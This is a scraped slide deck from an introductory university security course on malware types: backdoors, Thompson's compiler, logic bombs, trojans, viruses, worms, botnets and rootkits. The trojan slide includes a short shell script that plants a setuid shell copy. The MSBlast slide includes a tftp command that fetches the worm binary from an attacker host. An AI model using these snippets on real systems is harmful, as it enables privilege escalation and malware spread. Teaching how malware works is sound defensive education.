390 likes | 689 Views
Introduction to Malware. Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop. 1. 1. 1. What is Malicious Software?. Malicious Software (a.k.a. Malware )
E N D
Introduction to Malware Dan Fleck CS469 Security Engineering Reference: AngelosStavrou’s ISA564 and Computer Security by Bishop 1 1 1 Coming up: What is Malicious Software?
What is Malicious Software? Malicious Software (a.k.a. Malware) • Software designed to infiltrate or damage a computer system, without the owner's informed consent -- http://en.wikipedia.org/wiki/Malware • Examples: • Viruses, worms, Trojan horses, spyware, and other malicious and unwanted software • How about adware? • Malware references the intent of the creator, rather than any particular features • DRM v.s. Rootkit (e.g., Sony CD rootkit) 2 2 Coming up: Why should we care?Source: Symantec Internet Threat Report 2012
Why should we care?Source: Symantec Internet Threat Report 2012 3 3 Coming up: Why should we care?Source: Symantec Internet Threat Report 2012
Why should we care?Source: Symantec Internet Threat Report 2012 4 4 Coming up: Why should we care?Source: Symantec Internet Threat Report 2012
Why should we care?Source: Symantec Internet Threat Report 2012 5 5 Coming up: Taxonomy of Malicious Software
Taxonomy of Malicious Software 6 6 Coming up: Trapdoor/Backdoor
Trapdoor/Backdoor • Secret entry point into a system • Specific user identifier or password that circumvents normal security procedures. • Commonly used by developers • Could be included in a compiler. • Lets see Thompson’s Compiler 7 7 Coming up: Thompson's Compiler
Thompson's Compiler • Modify the compiler so that when it compiles login , login accepts the user's correct password or a fixed password (the same one for all users) • Then modify the compiler again, so when it compiles a new version of the compiler, the extra code to do the first step is automatically inserted • Recompile the compiler • Delete the source containing the modification and put the undoctored source back 8 8 Coming up: The Login Program
The Login Program user password login source correct compiler login executable logged in user password or magic password login source doctored compiler login executable 9 logged in Coming up: The Compiler
The Compiler login source compiler source correct compiler compiler executable correct login executable login source compiler source doctored compiler compiler executable 10 10 rigged login executable Coming up: Thompson’s Lesson
Thompson’s Lesson Verifying the source code isn’t always enough! 11 11 Coming up: Logic Bomb
Logic Bomb • Embedded in legitimate programs • Activated when specified conditions met • E.g., presence/absence of some file; Particular date/time or particular user • When triggered, typically damages system • Modify/delete files/disks • Example: Disgruntled employee adds trigger that when employee’s salary record deleted from DB, all personnel records deleted also. 12 12 Can you think of other logic bombs? Coming up: Trojan Horse
Trojan Horse Program with an expected and hidden effect • Appears normal/expected • hidden effect violates security policy User tricked into executing Trojan horse • Expects (and sees) expected behavior • Hidden effect performed with user’s authorization Attacker cat >/homes/victim/ls <<eof cp/bin/sh /tmp/.xxsh chmodu+s,o+x /tmp/.xxsh rm./ls ls$* eof Victim ls 13 13 Coming up: Trojan Horse Example: NetBus
Trojan Horse Example: NetBus • Designed for Windows NT system • Victim uploads and installs this • Usually disguised as a game program, or in one • Acts as a server, accepting and executing commands for remote administrator • This includes intercepting keystrokes and mouse motions and sending them to attacker • Also allows attacker to upload, download files 14 14 Coming up: Virus
Virus • Program that inserts itself into one or more files and performs some action • Insertion phaseis inserting itself into file • Execution phaseis performing some (possibly null) action • Self-replicating code • Generally tries to remain undetected • Pseudocode If spread condition then For target files if not infected then alter to include virus Perform malicious action Execute normal program (step done only by Trojan horses to remain hidden) 14 15 15 Coming up: Early Virus Reports
Early Virus Reports • Brain (Pakistani) virus (1986) • Written for IBM PCs • Alters boot sectors of floppies, spreads to other floppies • MacMag Peace virus (1987) • Written for Macintosh • Prints “universal message of peace” on March 2, 1988 and deletes itself 16 16 Coming up: Virus Types
Virus Types Boot Sector • Problem: How to ensure virus “carrier” executed? • Solution: Place in boot sector of disk • Run on any boot • Propagate by altering boot disk creation • Less common with few boots off floppies Executable • Malicious code placed at beginning of legitimate program (EXE or .COM • Runs when application run Brain virus used this 15 17 17 Coming up: Virus Types
Virus Types Macro Virus • Infected “executable” isn’t machine code • Relies on something “executed” inside application data • Common example: Macros • Otherwise similar properties to other viruses • Architecture-independent • Application-dependent 16 18 18 Coming up: Macro Virus Example
Macro Virus Example • Melissa • Infected Microsoft Word 97 and Word 98 documents • Windows and Macintosh systems • Invoked when program opens infected file • Installs itself as “open” macro and copies itself into Normal template • This way, infects any files that are opened in future • Invokes mail program, sends itself to everyone in user’s address book 19 19 Coming up: Virus Types
Virus Types Armored • Encrypt virus • Prevents “signature” to detect virus Stealth • Conceal Infection • Trap read and disinfect • Let execute call infected file Terminate and Stay Resident (TSR) • Stays active in memory after application complete • Allows infection of previously unknown files • Trap calls that execute a program • Request for file length: return length of uninfected file • Request to open file: temporarily disinfect file, and reinfect on closing • Request to load file for execution: load infected file 17 20 20 Coming up: Virus Types
Virus Types Polymorphic • A virus that changes its form each time it inserts itself into another program • Idea is to prevent signature detection by changing the “signature” or instructions used for deciphering routine • At instruction level: substitute instructions • At algorithm level: different algorithms to achieve the same purpose • Toolkits to make these exist (Mutation Engine, Trident Polymorphic Engine) 17 21 21 Coming up: Polymorphic Example
Polymorphic Example • These are different instructions (with different bit patterns) but have the same effect: • add 0 to register • subtract 0 from register • xor 0 with register • no-op • Polymorphic virus would pick randomly from among these instructions 22 22 Coming up: Worm
Worm • Runs independently • Does not require a host program • Propagates a fully working version of itself to other machines • Carries a payload performing hidden tasks • Backdoors, spam relays, DDoS agents; … • Phases • Probing Exploitation ReplicationPayload 18 23 23 So, how is a virus different from a worm? Coming up: Work Propagation
Work Propagation 19 24 24 Coming up: MSBlast Worm (Aug 2003)
MSBlast Worm (Aug 2003) TCP protocal: Direction: Inbound Local end point ports: 135 Application: ANY Remote End Point: ANY/ANY Rule valid: ALWAYS Action: DENY 2. Binds svchost.exe to port 4444/TCP via injected code 4. Creates shell “cmd.exe” and binds it to port 4444/TCP Runs TFTP command: teleports msblast.exe file 9. Runs worm on target 11. Shell closes 1. Exploits target on port 135/TCP 3. Connects to target on port 4444/TCP 5. Creates “TFTP Server” on port 696. Sends “TFTP” command to shell 8. Sends “START msblast.exe” command 10. Closes connection tftp –l 192.168.0.1 GET msblast.exe 20 25 25 Infected New Victim Coming up: Zombie
Zombie • Secretly takes over another networked computer by exploiting software flows • Builds the compromised computers into a zombie network or botnet • Uses it to indirectly launch attacks • E.g., DDoS Lets see how we create zombies.. 21 26 26 Coming up: Zombie
Computer 27 Lets see how we create zombies.. Coming up: Zombie: Steps - 1
Zombie: Steps - 1 Unsecured Computers Attacker 1 Attacker scans Internet for unsecured systems that can be compromised 22 27 28 Coming up: Zombie: Steps - 2
Zombie: Steps - 2 Unsecured Computers Attacker 2 Attacker secretly installs zombie agent program, turning unsecured computers into zombies 23 28 29 Coming up: Zombie: Steps - 3
Zombie: Steps - 3 Zombies Attacker 3 Zombie agents “phone home” and connect to a master server 24 29 30 Master Server Coming up: Zombie: Steps - 4
Zombie: Steps - 4 Zombies Attacker 4 Attacker sends commands to Maser Server to launch a DDoS attack against a targeted system 25 30 31 Master Server Coming up: Zombie: Steps - 5
Zombie: Steps - 5 Zombies TARGET Attacker 5 Master server sends signal to zombies to launch attack on targeted system 26 31 32 Master Server Coming up: Zombie: Steps - 6
Zombie: Steps - 6 Zombies TARGET Attacker Request Denied 6 Target system is overwhelmed by zombie requests denying requests from normal users 27 32 33 User Master Server Coming up: Rootkit
Rootkit • “A rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence on a computer” • Goals: • Hide malicious resources (e.g., processes, files, registry keys, open ports, etc.) • Provide hidden backdoor access 28 33 34 Coming up: Linux RootKit III
Linux RootKit III lsTrojaned! Hide files du Trojaned! Hide files ifconfigTrojaned! Hide sniffing netstatTrojaned! Hide connections chfnTrojaned! User->r00t chshTrojaned! User->r00t inetdTrojaned! Remote access login Trojaned! Remote access passwdTrojaned! User->r00t psTrojaned! Hide processes top Trojaned! Hide processes rshdTrojaned! Remote access syslogdTrojaned! Hide logs linsniffer Packet sniffer! fix File fixer! z2 Zap2 utmp/wtmp/lastlog eraser! wtedwtmp/utmp editor! lledlastlogeditor! bindshell port/shell type daemon! tcpdTrojaned! Hide connections, avoid denies 29 34 35 Coming up: Rootkit
Rootkit • Simple rootkits: • Modify user programs (ls, ps) • Detectable by tools like Tripwire • Sophisticated rootkits: • Modify the kernel itself • Hard to detect from userland 30 35 36 Coming up: Rootkit Classification
Rootkit Classification Add code to all apps See: http://www.phrack.org/issues.html?issue=62&id=12 Replace/modify kernel modules Replace apps 31 36 37 Coming up: Rootkit Classification
Rootkit Classification Run entire OS in a virtual machine 32 37 38 Coming up: Lessons
Lessons • Malware comes in many types and styles • It’s not going away and will always hit new platforms as they come out • We’ll need multiple approaches to defend against them. Next up: Malware Defense! 38 38 39 End of presentation